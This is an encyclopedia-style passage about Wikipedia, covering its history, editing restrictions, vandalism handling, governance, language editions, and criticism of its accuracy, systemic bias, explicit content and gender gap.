On January 18, 2012, the English Wikipedia participated in a series of coordinated protests against two proposed laws in the United States Congress—the Stop Online Piracy Act (SOPA) and the PROTECT IP Act (PIPA)—by blacking out its pages for 24 hours.[56] More than 162 million people viewed the blackout explanation page that temporarily replaced its content.[57][58]

On January 20, 2014, Subodh Varma reporting for The Economic Times indicated that not only had Wikipedia's growth stalled, it "had lost nearly ten percent of its page views last year. There was a decline of about two billion between December 2012 and December 2013. Its most popular versions are leading the slide: page-views of the English Wikipedia declined by twelve percent, those of German version slid by 17 percent and the Japanese version lost nine percent."[59] Varma added, "While Wikipedia's managers think that this could be due to errors in counting, other experts feel that Google's Knowledge Graphs project launched last year may be gobbling up Wikipedia users."[59] When contacted on this matter, Clay Shirky, associate professor at New York University and fellow at Harvard's Berkman Klein Center for Internet & Society said that he suspected much of the page-view decline was due to Knowledge Graphs, stating, "If you can get your question answered from the search page, you don't need to click [any further]."[59] By the end of December 2016, Wikipedia was ranked the 5th most popular website globally.[60]

In January 2013, 274301 Wikipedia, an asteroid, was named after Wikipedia; in October 2014, Wikipedia was honored with the Wikipedia Monument; and, in July 2015, 106 of the 7,473 700-page volumes of Wikipedia became available as Print Wikipedia. In April 2019, an Israeli lunar lander, Beresheet, crash landed on the surface of the Moon carrying a copy of nearly all of the English Wikipedia engraved on thin nickel plates; experts say the plates likely survived the crash.[61][62] In June 2019, scientists reported that all 16 GB of article text from the English Wikipedia had been encoded into synthetic DNA.[63]

Current state

On January 23, 2020, the English-language Wikipedia, which is the largest language section of the online encyclopedia, published its six millionth article.

By February 2020, Wikipedia ranked eleventh in the world in terms of Internet traffic.[64] As a key resource for disseminating information related to COVID-19, the World Health Organization has partnered with Wikipedia to help combat the spread of misinformation.[65][66]

Wikipedia accepts cryptocurrency donations and Basic Attention Token.[67][68][69]

Openness

Differences between versions of an article are highlighted

Unlike traditional encyclopedias, Wikipedia follows the procrastination principle[note 3] regarding the security of its content.[70]

Restrictions

Due to Wikipedia's increasing popularity, some editions, including the English version, have introduced editing restrictions for certain cases. For instance, on the English Wikipedia and some other language editions, only registered users may create a new article.[71] On the English Wikipedia, among others, particularly controversial, sensitive or vandalism-prone pages have been protected to varying degrees.[72][73] A frequently vandalized article can be "semi-protected" or "extended confirmed protected", meaning that only "autoconfirmed" or "extended confirmed" editors can modify it.[74] A particularly contentious article may be locked so that only administrators can make changes.[75] A 2021 article in the Columbia Journalism Review identified Wikipedia's page-protection policies as "[p]erhaps the most important" means at its disposal to "regulate its market of ideas".[76]

In certain cases, all editors are allowed to submit modifications, but review is required for some editors, depending on certain conditions. For example, the German Wikipedia maintains "stable versions" of articles[77] which have passed certain reviews. Following protracted trials and community discussion, the English Wikipedia introduced the "pending changes" system in December 2012. Under this system, new and unregistered users' edits to certain controversial or vandalism-prone articles are reviewed by established users before they are published.[79]

Wikipedia's editing interface

Review of changes

Although changes are not systematically reviewed, the software that powers Wikipedia provides tools allowing anyone to review changes made by others. Each article's History page links to each revision.[note 4][80] On most articles, anyone can undo others' changes by clicking a link on the article's History page. Anyone can view the latest changes to articles, and anyone registered may maintain a "watchlist" of articles that interest them so they can be notified of changes. "New pages patrol" is a process where newly created articles are checked for obvious problems.[81]

In 2003, economics Ph.D. student Andrea Ciffolilli argued that the low transaction costs of participating in a wiki created a catalyst for collaborative development, and that features such as allowing easy access to past versions of a page favored "creative construction" over "creative destruction".[82]

Vandalism

Main article: Vandalism on Wikipedia

Any change or edit that manipulates content in a way that purposefully compromises Wikipedia's integrity is considered vandalism. The most common and obvious types of vandalism include additions of obscenities and crude humor; it can also include advertising and other types of spam.[83] Sometimes editors commit vandalism by removing content or entirely blanking a given page. Less common types of vandalism, such as the deliberate addition of plausible but false information, can be more difficult to detect. Vandals can introduce irrelevant formatting, modify page semantics such as the page's title or categorization, manipulate the article's underlying code, or use images disruptively.[84]

Obvious vandalism is generally easy to remove from Wikipedia articles; the median time to detect and fix it is a few minutes.[85][86] However, some vandalism takes much longer to detect and repair.[87]

In the Seigenthaler biography incident, an anonymous editor introduced false information into the biography of American political figure John Seigenthaler in May 2005, falsely presenting him as a suspect in the assassination of John F. Kennedy.[87] It remained uncorrected for four months.[87] Seigenthaler, the founding editorial director of USA Today and founder of the Freedom Forum First Amendment Center at Vanderbilt University, called Wikipedia co-founder Jimmy Wales and asked whether he had any way of knowing who contributed the misinformation. Wales said he did not, although the perpetrator was eventually traced.[88][89] After the incident, Seigenthaler described Wikipedia as "a flawed and irresponsible research tool".[87] The incident led to policy changes at Wikipedia for tightening up the verifiability of biographical articles of living people.[90]

In 2010, Daniel Tosh encouraged viewers of his show, Tosh.0, to visit the show's Wikipedia article and edit it at will. On a later episode, he commented on the edits to the article, most of them offensive, which had been made by the audience and had prompted the article to be locked from editing.[91][92]

Edit warring

Wikipedians often have disputes regarding content, which may result in repeated competing changes to an article, known as "edit warring".[93][94] It is widely seen as a resource-consuming scenario where no useful knowledge is added,[95] and criticized as creating a competitive[96] and conflict-based[97] editing culture associated with traditional masculine gender roles.[98]

Policies and laws

Content in Wikipedia is subject to the laws (in particular, copyright laws) of the United States and of the US state of Virginia, where the majority of Wikipedia's servers are located. Beyond legal matters, the editorial principles of Wikipedia are embodied in the "five pillars" and in numerous policies and guidelines intended to appropriately shape content. Even these rules are stored in wiki form, and Wikipedia editors write and revise the website's policies and guidelines.[99] Editors can enforce these rules by deleting or modifying non-compliant material. Originally, rules on the non-English editions of Wikipedia were based on a translation of the rules for the English Wikipedia. They have since diverged to some extent.[77]

Content policies and guidelines

According to the rules on the English Wikipedia, each entry in Wikipedia must be about a topic that is encyclopedic and is not a dictionary entry or dictionary-style.[100] A topic should also meet Wikipedia's standards of "notability",[101] which generally means that the topic must have been covered in mainstream media or major academic journal sources that are independent of the article's subject. Further, Wikipedia intends to convey only knowledge that is already established and recognized.[102] It must not present original research. A claim that is likely to be challenged requires a reference to a reliable source. Among Wikipedia editors, this is often phrased as "verifiability, not truth" to express the idea that the readers, not the encyclopedia, are ultimately responsible for checking the truthfulness of the articles and making their own interpretations.[103] This can at times lead to the removal of information that, though valid, is not properly sourced.[104] Finally, Wikipedia must not take sides.[105]

Governance

Further information: Wikipedia:Administration

Wikipedia's initial anarchy integrated democratic and hierarchical elements over time.[106][107] An article is not considered to be owned by its creator or any other editor, nor by the subject of the article.[108]

Administrators

Editors in good standing in the community can request extra user rights, granting them the technical ability to perform certain special actions. In particular, editors can choose to run for "adminship",[109][110] which includes the ability to delete pages or prevent them from being changed in cases of severe vandalism or editorial disputes. Administrators are not supposed to enjoy any special privilege in decision-making; instead, their powers are mostly limited to making edits that have project-wide effects and thus are disallowed to ordinary editors, and to implement restrictions intended to prevent disruptive editors from making unproductive edits.[111][112]

By 2012, fewer editors were becoming administrators compared to Wikipedia's earlier years, in part because the process of vetting potential administrators had become more rigorous.[113]

Dispute resolution

Over time, Wikipedia has developed a semiformal dispute resolution process. To determine community consensus, editors can raise issues at appropriate community forums,[note 5] seek outside input through third opinion requests, or initiate a more general community discussion known as a "request for comment".

Arbitration Committee

Main article: Arbitration Committee

The Arbitration Committee presides over the ultimate dispute resolution process. Although disputes usually arise from a disagreement between two opposing views on how an article should read, the Arbitration Committee explicitly refuses to directly rule on the specific view that should be adopted. Statistical analyses suggest that the committee ignores the content of disputes and rather focuses on the way disputes are conducted,[114] functioning not so much to resolve disputes and make peace between conflicting editors, but to weed out problematic editors while allowing potentially productive editors back in to participate. Therefore, the committee does not dictate the content of articles, although it sometimes condemns content changes when it deems the new content violates Wikipedia policies (for example, if the new content is considered biased). Its remedies include cautions and probations (used in 63% of cases) and banning editors from articles (43%), subject matters (23%), or Wikipedia (16%).[when?] Complete bans from Wikipedia are generally limited to instances of impersonation and anti-social behavior. When conduct is not impersonation or anti-social, but rather anti-consensus or in violation of editing policies, remedies tend to be limited to warnings.[115]

Main article: Wikipedia community

Each article and each user of Wikipedia has an associated "talk" page. These form the primary communication channel for editors to discuss, coordinate and debate.[116]

Wikipedia's community has been described as cultlike,[117] although not always with entirely negative connotations.[118] Its preference for cohesiveness, even if it requires compromise that includes disregard of credentials, has been referred to as "anti-elitism".[119]

Wikipedians sometimes award one another "virtual barnstars" for good work. These personalized tokens of appreciation reveal a wide range of valued work extending far beyond simple editing to include social support, administrative actions, and types of articulation work.[120]

Wikipedia does not require that its editors and contributors provide identification.[121] As Wikipedia grew, "Who writes Wikipedia?" became one of the questions frequently asked there.[122] Jimmy Wales once argued that only "a community ... a dedicated group of a few hundred volunteers" makes the bulk of contributions to Wikipedia and that the project is therefore "much like any traditional organization".[123] In 2008, a Slate magazine article reported that: "According to researchers in Palo Alto, one percent of Wikipedia users are responsible for about half of the site's edits."[124] This method of evaluating contributions was later disputed by Aaron Swartz, who noted that several articles he sampled had large portions of their content (measured by number of characters) contributed by users with low edit counts.[125]

The English Wikipedia has 6,410,280 articles, 42,573,941 registered editors, and 125,342 active editors. An editor is considered active if they have made one or more edits in the past 30 days.

Editors who fail to comply with Wikipedia cultural rituals, such as signing talk page comments, may implicitly signal that they are Wikipedia outsiders, increasing the odds that Wikipedia insiders may target or discount their contributions. Becoming a Wikipedia insider involves non-trivial costs: the contributor is expected to learn Wikipedia-specific technological codes, submit to a sometimes convoluted dispute resolution process, and learn a "baffling culture rich with in-jokes and insider references".[126] Editors who do not log in are in some sense second-class citizens on Wikipedia,[126] as "participants are accredited by members of the wiki community, who have a vested interest in preserving the quality of the work product, on the basis of their ongoing participation",[127] but the contribution histories of anonymous unregistered editors recognized only by their IP addresses cannot be attributed to a particular editor with certainty.

Studies

A 2007 study by researchers from Dartmouth College found that "anonymous and infrequent contributors to Wikipedia ... are as reliable a source of knowledge as those contributors who register with the site".[128] Jimmy Wales stated in 2009 that "[I]t turns out over 50% of all the edits are done by just .7% of the users ... 524 people ... And in fact, the most active 2%, which is 1400 people, have done 73.4% of all the edits."[123] However, Business Insider editor and journalist Henry Blodget showed in 2009 that in a random sample of articles, most Wikipedia content (measured by the amount of contributed text that survives to the latest sampled edit) is created by "outsiders", while most editing and formatting is done by "insiders".[123]

A 2008 study found that Wikipedians were less agreeable, open, and conscientious than others,[129][130] although a later commentary pointed out serious flaws, including that the data showed higher openness and that the differences with the control group and the samples were small.[131] According to a 2009 study, there is "evidence of growing resistance from the Wikipedia community to new content".[132]

Diversity

Several studies have shown that most Wikipedia contributors are male. Notably, the results of a Wikimedia Foundation survey in 2008 showed that only 13 percent of Wikipedia editors were female.[133] Because of this, universities throughout the United States tried to encourage women to become Wikipedia contributors. Similarly, many of these universities, including Yale and Brown, gave college credit to students who create or edit an article relating to women in science or technology.[134]Andrew Lih, a professor and scientist, wrote in The New York Times that the reason he thought the number of male contributors outnumbered the number of females so greatly was because identifying as a woman may expose oneself to "ugly, intimidating behavior".[135] Data has shown that Africans are underrepresented among Wikipedia editors.[136]

Language editions

Main article: List of Wikipedias

Most popular edition of Wikipedia by country in January 2021.
Most viewed editions of Wikipedia over time.
Most edited editions of Wikipedia over time.

There are currently 325 language editions of Wikipedia (also called language versions, or simply Wikipedias). As of November 2021, the six largest, in order of article count, are the English, Cebuano, Swedish, German, French, and Dutch Wikipedias.[138] The second and third-largest Wikipedias owe their position to the article-creating botLsjbot, which as of 2013[update] had created about half the articles on the Swedish Wikipedia, and most of the articles in the Cebuano and Waray Wikipedias. The latter are both languages of the Philippines.

In addition to the top six, twelve other Wikipedias have more than a million articles each (Russian, Spanish, Italian, Polish, Egyptian Arabic, Japanese, Vietnamese, Waray, Chinese, Arabic, Ukrainian and Portuguese), seven more have over 500,000 articles (Persian, Catalan, Serbian, Indonesian, Norwegian, Korean and Finnish), 44 more have over 100,000, and 82 more have over 10,000.[139][138] The largest, the English Wikipedia, has over 6.4 million articles. As of January 2021,[update] the English Wikipedia receives 48% of Wikipedia's cumulative traffic, with the remaining split among the other languages. The top 10 editions represent approximately 85% of the total traffic.[140]

0.1 0.3 1 3

English 6,410,280

Cebuano 6,061,619

Swedish 2,872,837

German 2,633,512

French 2,374,985

Dutch 2,071,672

Russian 1,771,487

Spanish 1,731,929

Italian 1,726,585

Polish 1,496,935

Egyptian Arabic 1,378,106

Japanese 1,301,041

Vietnamese 1,270,100

Waray 1,265,576

Chinese 1,241,658

Arabic 1,143,507

Ukrainian 1,123,328

Portuguese 1,077,410

Persian 846,692

Catalan 689,830

The unit for the numbers in bars is articles.

Since Wikipedia is based on the Web and therefore worldwide, contributors to the same language edition may use different dialects or may come from different countries (as is the case for the English edition). These differences may lead to some conflicts over spelling differences (e.g. colour versus color)[142] or points of view.[143]

Though the various language editions are held to global policies such as "neutral point of view", they diverge on some points of policy and practice, most notably on whether images that are not licensed freely may be used under a claim of fair use.[144][145][146]

Jimmy Wales has described Wikipedia as "an effort to create and distribute a free encyclopedia of the highest possible quality to every single person on the planet in their own language".[147] Though each language edition functions more or less independently, some efforts are made to supervise them all. They are coordinated in part by Meta-Wiki, the Wikimedia Foundation's wiki devoted to maintaining all its projects (Wikipedia and others).[148] For instance, Meta-Wiki provides important statistics on all language editions of Wikipedia,[149] and it maintains a list of articles every Wikipedia should have.[150] The list concerns basic content by subject: biography, history, geography, society, culture, science, technology, and mathematics. It is not rare for articles strongly related to a particular language not to have counterparts in another edition. For example, articles about small towns in the United States might be available only in English, even when they meet the notability criteria of other language Wikipedia projects.

Estimation of contributions shares from different regions in the world to different Wikipedia editions[151]

Translated articles represent only a small portion of articles in most editions, in part because those editions do not allow fully automated translation of articles. Articles available in more than one language may offer "interwiki links", which link to the counterpart articles in other editions.[citation needed]

A study published by PLOS One in 2012 also estimated the share of contributions to different editions of Wikipedia from different regions of the world. It reported that the proportion of the edits made from North America was 51% for the English Wikipedia, and 25% for the simple English Wikipedia.[151]

English Wikipedia editor numbers

Number of editors on the English Wikipedia over time.

On March 1, 2014, The Economist, in an article titled "The Future of Wikipedia", cited a trend analysis concerning data published by the Wikimedia Foundation stating that "[t]he number of editors for the English-language version has fallen by a third in seven years."[152] The attrition rate for active editors in English Wikipedia was cited by The Economist as substantially in contrast to statistics for Wikipedia in other languages (non-English Wikipedia). The Economist reported that the number of contributors with an average of five or more edits per month was relatively constant since 2008 for Wikipedia in other languages at approximately 42,000 editors within narrow seasonal variances of about 2,000 editors up or down. The number of active editors in English Wikipedia, by sharp comparison, was cited as peaking in 2007 at approximately 50,000 and dropping to 30,000 by the start of 2014.

In contrast, the trend analysis published in The Economist presents Wikipedia in other languages (non-English Wikipedia) as successful in retaining their active editors on a renewable and sustained basis, with their numbers remaining relatively constant at approximately 42,000.[152] No comment was made concerning which of the differentiated edit policy standards from Wikipedia in other languages (non-English Wikipedia) would provide a possible alternative to English Wikipedia for effectively ameliorating substantial editor attrition rates on the English-language Wikipedia.[153]

Reception

See also: Academic studies about Wikipedia and Criticism of Wikipedia

Ambox current red Americas.svg

This section needs to be updated. Please help update this article to reflect recent events or newly available information.(March 2018)

Various Wikipedians have criticized Wikipedia's large and growing regulation, which includes more than fifty policies and nearly 150,000 words as of 2014.[update][154][155]

Critics have stated that Wikipedia exhibits systemic bias. In 2010, columnist and journalist Edwin Black described Wikipedia as being a mixture of "truth, half-truth, and some falsehoods".[156] Articles in The Chronicle of Higher Education and The Journal of Academic Librarianship have criticized Wikipedia's "Undue Weight" policy, concluding that the fact that Wikipedia explicitly is not designed to provide correct information about a subject, but rather focus on all the major viewpoints on the subject, give less attention to minor ones, and creates omissions that can lead to false beliefs based on incomplete information.[157][158][159]

Journalists Oliver Kamm and Edwin Black alleged (in 2010 and 2011 respectively) that articles are dominated by the loudest and most persistent voices, usually by a group with an "ax to grind" on the topic.[156][160] A 2008 article in Education Next Journal concluded that as a resource about controversial topics, Wikipedia is subject to manipulation and spin.[161]

In 2020, Omer Benjakob and Stephen Harrison noted that "Media coverage of Wikipedia has radically shifted over the past two decades: once cast as an intellectual frivolity, it is now lauded as the 'last bastion of shared reality' online."[162]

In 2006, the Wikipedia Watch criticism website listed dozens of examples of plagiarism in the English Wikipedia.[163]

Accuracy of content

Main article: Reliability of Wikipedia

Articles for traditional encyclopedias such as Encyclopædia Britannica are written by experts, lending such encyclopedias a reputation for accuracy.[164] However, a peer review in 2005 of forty-two scientific entries on both Wikipedia and Encyclopædia Britannica by the science journal Nature found few differences in accuracy, and concluded that "the average science entry in Wikipedia contained around four inaccuracies; Britannica, about three."[165] Joseph Reagle suggested that while the study reflects "a topical strength of Wikipedia contributors" in science articles, "Wikipedia may not have fared so well using a random sampling of articles or on humanities subjects."[166] Others raised similar critiques.[167] The findings by Nature were disputed by Encyclopædia Britannica,[168][169] and in response, Nature gave a rebuttal of the points raised by Britannica.[170] In addition to the point-for-point disagreement between these two parties, others have examined the sample size and selection method used in the Nature effort, and suggested a "flawed study design" (in Nature's manual selection of articles, in part or in whole, for comparison), absence of statistical analysis (e.g., of reported confidence intervals), and a lack of study "statistical power" (i.e., owing to small sample size, 42 or 4 × 101 articles compared, vs >105 and >106 set sizes for Britannica and the English Wikipedia, respectively).[171]

As a consequence of the open structure, Wikipedia "makes no guarantee of validity" of its content, since no one is ultimately responsible for any claims appearing in it.[172] Concerns have been raised by PC World in 2009 regarding the lack of accountability that results from users' anonymity,[173] the insertion of false information,[174]vandalism, and similar problems.

Economist Tyler Cowen wrote: "If I had to guess whether Wikipedia or the median refereed journal article on economics was more likely to be true after a not so long think I would opt for Wikipedia." He comments that some traditional sources of non-fiction suffer from systemic biases, and novel results, in his opinion, are over-reported in journal articles as well as relevant information being omitted from news reports. However, he also cautions that errors are frequently found on Internet sites and that academics and experts must be vigilant in correcting them.[175]Amy Bruckman has argued that, due to the number of reviewers, "the content of a popular Wikipedia page is actually the most reliable form of information ever created".[176]

Critics argue that Wikipedia's open nature and a lack of proper sources for most of the information makes it unreliable.[177] Some commentators suggest that Wikipedia may be reliable, but that the reliability of any given article is not clear.[178] Editors of traditional reference works such as the Encyclopædia Britannica have questioned the project's utility and status as an encyclopedia.[179] Wikipedia co-founder Jimmy Wales has claimed that Wikipedia has largely avoided the problem of "fake news" because the Wikipedia community regularly debates the quality of sources in articles.[180]

Wikipedia's open structure inherently makes it an easy target for Internet trolls, spammers, and various forms of paid advocacy seen as counterproductive to the maintenance of a neutral and verifiable online encyclopedia.[80][182] In response to paid advocacy editing and undisclosed editing issues, Wikipedia was reported in an article in The Wall Street Journal, to have strengthened its rules and laws against undisclosed editing.[183] The article stated that: "Beginning Monday [from the date of the article, June 16, 2014], changes in Wikipedia's terms of use will require anyone paid to edit articles to disclose that arrangement. Katherine Maher, the nonprofit Wikimedia Foundation's chief communications officer, said the changes address a sentiment among volunteer editors that, 'we're not an advertising service; we're an encyclopedia.'"[183][184][185][186][187] These issues, among others, had been parodied since the first decade of Wikipedia, notably by Stephen Colbert on The Colbert Report.[188]

A Harvard law textbook, Legal Research in a Nutshell (2011), cites Wikipedia as a "general source" that "can be a real boon" in "coming up to speed in the law governing a situation" and, "while not authoritative, can provide basic facts as well as leads to more in-depth resources".[189]

Discouragement in education

Ambox current red Americas.svg

This section needs to be updated. Please help update this article to reflect recent events or newly available information.(December 2020)

Most university lecturers discourage students from citing any encyclopedia in academic work, preferring primary sources;[190] some specifically prohibit Wikipedia citations. Wales stresses that encyclopedias of any type are not usually appropriate to use as citable sources, and should not be relied upon as authoritative.[193] Wales once (2006 or earlier) said he receives about ten emails weekly from students saying they got failing grades on papers because they cited Wikipedia; he told the students they got what they deserved. "For God's sake, you're in college; don't cite the encyclopedia," he said.[194]

In February 2007, an article in The Harvard Crimson newspaper reported that a few of the professors at Harvard University were including Wikipedia articles in their syllabi, although without realizing the articles might change.[195] In June 2007, former president of the American Library AssociationMichael Gorman condemned Wikipedia, along with Google,[196] stating that academics who endorse the use of Wikipedia are "the intellectual equivalent of a dietitian who recommends a steady diet of Big Macs with everything".

In contrast, academic writing[clarification needed] in Wikipedia has evolved in recent years and has been found to increase student interest, personal connection to the product, creativity in material processing, and international collaboration in the learning process.[197]

Medical information

See also: Health information on Wikipedia

On March 5, 2014, Julie Beck writing for The Atlantic magazine in an article titled "Doctors' #1 Source for Healthcare Information: Wikipedia", stated that "Fifty percent of physicians look up conditions on the (Wikipedia) site, and some are editing articles themselves to improve the quality of available information."[198] Beck continued to detail in this article new programs of Amin Azzam at the University of San Francisco to offer medical school courses to medical students for learning to edit and improve Wikipedia articles on health-related issues, as well as internal quality control programs within Wikipedia organized by James Heilman to improve a group of 200 health-related articles of central medical importance up to Wikipedia's highest standard of articles using its Featured Article and Good Article peer-review evaluation process.[198] In a May 7, 2014, follow-up article in The Atlantic titled "Can Wikipedia Ever Be a Definitive Medical Text?", Julie Beck quotes WikiProject Medicine's James Heilman as stating: "Just because a reference is peer-reviewed doesn't mean it's a high-quality reference."[199] Beck added that: "Wikipedia has its own peer review process before articles can be classified as 'good' or 'featured'. Heilman, who has participated in that process before, says 'less than one percent' of Wikipedia's medical articles have passed."[199]

Quality of writing

Screenshot of English Wikipedia's article on Earth, a featured-class article

In a 2006 mention of Jimmy Wales, Time magazine stated that the policy of allowing anyone to edit had made Wikipedia the "biggest (and perhaps best) encyclopedia in the world".[200]

In 2008, researchers at Carnegie Mellon University found that the quality of a Wikipedia article would suffer rather than gain from adding more writers when the article lacked appropriate explicit or implicit coordination.[201] For instance, when contributors rewrite small portions of an entry rather than making full-length revisions, high- and low-quality content may be intermingled within an entry. Roy Rosenzweig, a history professor, stated that American National Biography Online outperformed Wikipedia in terms of its "clear and engaging prose", which, he said, was an important aspect of good historical writing.[202] Contrasting Wikipedia's treatment of Abraham Lincoln to that of Civil War historian James McPherson in American National Biography Online, he said that both were essentially accurate and covered the major episodes in Lincoln's life, but praised "McPherson's richer contextualization ... his artful use of quotations to capture Lincoln's voice ... and ... his ability to convey a profound message in a handful of words." By contrast, he gives an example of Wikipedia's prose that he finds "both verbose and dull". Rosenzweig also criticized the "waffling—encouraged by the NPOV policy—[which] means that it is hard to discern any overall interpretive stance in Wikipedia history". While generally praising the article on William Clarke Quantrill, he quoted its conclusion as an example of such "waffling", which then stated: "Some historians ... remember him as an opportunistic, bloodthirsty outlaw, while others continue to view him as a daring soldier and local folk hero."[202]

Other critics have made similar charges that, even if Wikipedia articles are factually accurate, they are often written in a poor, almost unreadable style. Frequent Wikipedia critic Andrew Orlowski commented, "Even when a Wikipedia entry is 100 percent factually correct, and those facts have been carefully chosen, it all too often reads as if it has been translated from one language to another then into a third, passing an illiterate translator at each stage."[203] A study of Wikipedia articles on cancer was conducted in 2010 by Yaacov Lawrence of the Kimmel Cancer Center at Thomas Jefferson University. The study was limited to those articles that could be found in the Physician Data Query and excluded those written at the "start" class or "stub" class level. Lawrence found the articles accurate but not very readable, and thought that "Wikipedia's lack of readability (to non-college readers) may reflect its varied origins and haphazard editing".[204]The Economist argued that better-written articles tend to be more reliable: "inelegant or ranting prose usually reflects muddled thoughts and incomplete information".[205]

Coverage of topics and systemic bias

See also: Notability in the English Wikipedia and Criticism of Wikipedia § Systemic bias in coverage

Ambox current red Americas.svg

Parts of this article (those related to d:Wikidata:Statistics/Wikipedia) need to be updated. Please help update this article to reflect recent events or newly available information.(March 2017)

Wikipedia seeks to create a summary of all human knowledge in the form of an online encyclopedia, with each topic covered encyclopedically in one article. Since it has terabytes of disk space, it can have far more topics than can be covered by any printed encyclopedia.[206] The exact degree and manner of coverage on Wikipedia is under constant review by its editors, and disagreements are not uncommon (see deletionism and inclusionism).[207][208] Wikipedia contains materials that some people may find objectionable, offensive, or pornographic. The "Wikipedia is not censored" policy has sometimes proved controversial: in 2008, Wikipedia rejected an online petition against the inclusion of images of Muhammad in the English edition of its Muhammad article, citing this policy. The presence of politically, religiously, and pornographically sensitive materials in Wikipedia has led to the censorship of Wikipedia by national authorities in China[209] and Pakistan,[210] amongst other countries.

A 2008 study conducted by researchers at Carnegie Mellon University and Palo Alto Research Center gave a distribution of topics as well as growth (from July 2006 to January 2008) in each field:[211]

  • Culture and Arts: 30% (210%)
  • Biographies and persons: 15% (97%)
  • Geography and places: 14% (52%)
  • Society and social sciences: 12% (83%)
  • History and events: 11% (143%)
  • Natural and Physical Sciences: 9% (213%)
  • Technology and Applied Science: 4% (−6%)
  • Religions and belief systems: 2% (38%)
  • Health: 2% (42%)
  • Mathematics and logic: 1% (146%)
  • Thought and Philosophy: 1% (160%)

These numbers refer only to the number of articles: it is possible for one topic to contain a large number of short articles and another to contain a small number of large ones. Through its "Wikipedia Loves Libraries" program, Wikipedia has partnered with major public libraries such as the New York Public Library for the Performing Arts to expand its coverage of underrepresented subjects and articles.[212]

A 2011 study conducted by researchers at the University of Minnesota indicated that male and female editors focus on different coverage topics. There was a greater concentration of females in the "people and arts" category, while males focus more on "geography and science".[213]

Coverage of topics and selection bias

Research conducted by Mark Graham of the Oxford Internet Institute in 2009 indicated that the geographic distribution of article topics is highly uneven. Africa is the most underrepresented.[214] Across 30 language editions of Wikipedia, historical articles and sections are generally Eurocentric and focused on recent events.[215]

An editorial in The Guardian in 2014 claimed that more effort went into providing references for a list of female porn actors than a list of women writers.[216] Data has also shown that Africa-related material often faces omission; a knowledge gap that a July 2018 Wikimedia conference in Cape Town sought to address.[136]

Systemic biases

When multiple editors contribute to one topic or set of topics, systemic bias may arise, due to the demographic backgrounds of the editors. In 2011, Wales claimed that the unevenness of coverage is a reflection of the demography of the editors, citing for example "biographies of famous women through history and issues surrounding early childcare".[48] The October 22, 2013, essay by Tom Simonite in MIT's Technology Review titled "The Decline of Wikipedia" discussed the effect of systemic bias and policy creep on the downward trend in the number of editors.[49]

Systemic bias on Wikipedia may follow that of culture generally,[vague] for example favoring certain nationalities, ethnicities or majority religions.[217] It may more specifically follow the biases of Internet culture, inclining to be young, male, English-speaking, educated, technologically aware, and wealthy enough to spare time for editing. Biases, intrinsically, may include an overemphasis on topics such as pop culture, technology, and current events.[217]

Taha Yasseri of the University of Oxford, in 2013, studied the statistical trends of systemic bias at Wikipedia introduced by editing conflicts and their resolution.[218][219] His research examined the counterproductive work behavior of edit warring. Yasseri contended that simple reverts or "undo" operations were not the most significant measure of counterproductive behavior at Wikipedia and relied instead on the statistical measurement of detecting "reverting/reverted pairs" or "mutually reverting edit pairs". Such a "mutually reverting edit pair" is defined where one editor reverts the edit of another editor who then, in sequence, returns to revert the first editor in the "mutually reverting edit pairs". The results were tabulated for several language versions of Wikipedia. The English Wikipedia's three largest conflict rates belonged to the articles George W. Bush, anarchism, and Muhammad.[219] By comparison, for the German Wikipedia, the three largest conflict rates at the time of the Oxford study were for the articles covering Croatia, Scientology, and 9/11 conspiracy theories.[219]

Researchers from Washington University developed a statistical model to measure systematic bias in the behavior of Wikipedia's users regarding controversial topics. The authors focused on behavioral changes of the encyclopedia's administrators after assuming the post, writing that systematic bias occurred after the fact.[220][221]

Explicit content

See also: Internet Watch Foundation and Wikipedia and Reporting of child pornography images on Wikimedia Commons

"Wikipedia censorship" redirects here. For the government censorship of Wikipedia, see Censorship of Wikipedia. For Wikipedia's policy concerning censorship, see Wikipedia:Wikipedia is not censored

Wikipedia has been criticized for allowing information about graphic content. Articles depicting what some critics have called objectionable content (such as feces, cadaver, human penis, vulva, and nudity) contain graphic pictures and detailed information easily available to anyone with access to the internet, including children.

The site also includes sexual content such as images and videos of masturbation and ejaculation, illustrations of zoophilia, and photos from hardcore pornographic films in its articles. It also has non-sexual photographs of nude children.

The Wikipedia article about Virgin Killer—a 1976 album from the GermanrockbandScorpions—features a picture of the album's original cover, which depicts a naked prepubescent girl. The original release cover caused controversy and was replaced in some countries. In December 2008, access to the Wikipedia article Virgin Killer was blocked for four days by most Internet service providers in the United Kingdom after the Internet Watch Foundation (IWF) decided the album cover was a potentially illegal indecent image and added the article's URL to a "blacklist" it supplies to British internet service providers.[222]

In April 2010, Sanger wrote a letter to the Federal Bureau of Investigation, outlining his concerns that two categories of images on Wikimedia Commons contained child pornography, and were in violation of US federal obscenity law.[223][224] Sanger later clarified that the images, which were related to pedophilia and one about lolicon, were not of real children, but said that they constituted "obscene visual representations of the sexual abuse of children", under the PROTECT Act of 2003.[225] That law bans photographic child pornography and cartoon images and drawings of children that are obscene under American law.[225] Sanger also expressed concerns about access to the images on Wikipedia in schools.[226]Wikimedia Foundation spokesman Jay Walsh strongly rejected Sanger's accusation,[227] saying that Wikipedia did not have "material we would deem to be illegal. If we did, we would remove it."[227] Following the complaint by Sanger, Wales deleted sexual images without consulting the community. After some editors who volunteer to maintain the site argued that the decision to delete had been made hastily, Wales voluntarily gave up some of the powers he had held up to that time as part of his co-founder status. He wrote in a message to the Wikimedia Foundation mailing-list that this action was "in the interest of encouraging this discussion to be about real philosophical/content issues, rather than be about me and how quickly I acted".[228] Critics, including Wikipediocracy, noticed that many of the pornographic images deleted from Wikipedia since 2010 have reappeared.[229]

Privacy

One privacy concern in the case of Wikipedia is the right of a private citizen to remain a "private citizen" rather than a "public figure" in the eyes of the law.[230][note 6] It is a battle between the right to be anonymous in cyberspace and the right to be anonymous in real life ("meatspace"). A particular problem occurs in the case of a relatively unimportant individual and for whom there exists a Wikipedia page against her or his wishes.

In January 2006, a German court ordered the German Wikipedia shut down within Germany because it stated the full name of Boris Floricic, aka "Tron", a deceased hacker. On February 9, 2006, the injunction against Wikimedia Deutschland was overturned, with the court rejecting the notion that Tron's right to privacy or that of his parents was being violated.[231]

Wikipedia has a "Volunteer Response Team" that uses Znuny, a free and open-source software fork of OTRS[232] to handle queries without having to reveal the identities of the involved parties. This is used, for example, in confirming the permission for using individual images and other media in the project.[233]

Sexism

Main article: Gender bias on Wikipedia

Wikipedia was described in 2015 as harboring a battleground culture of sexism and harassment.[234][235]

The perceived toxic attitudes and tolerance of violent and abusive language were reasons put forth in 2013 for the gender gap in Wikipedia editorship.[236]

Edit-a-thons have been held to encourage female editors and increase the coverage of women's topics.[237]

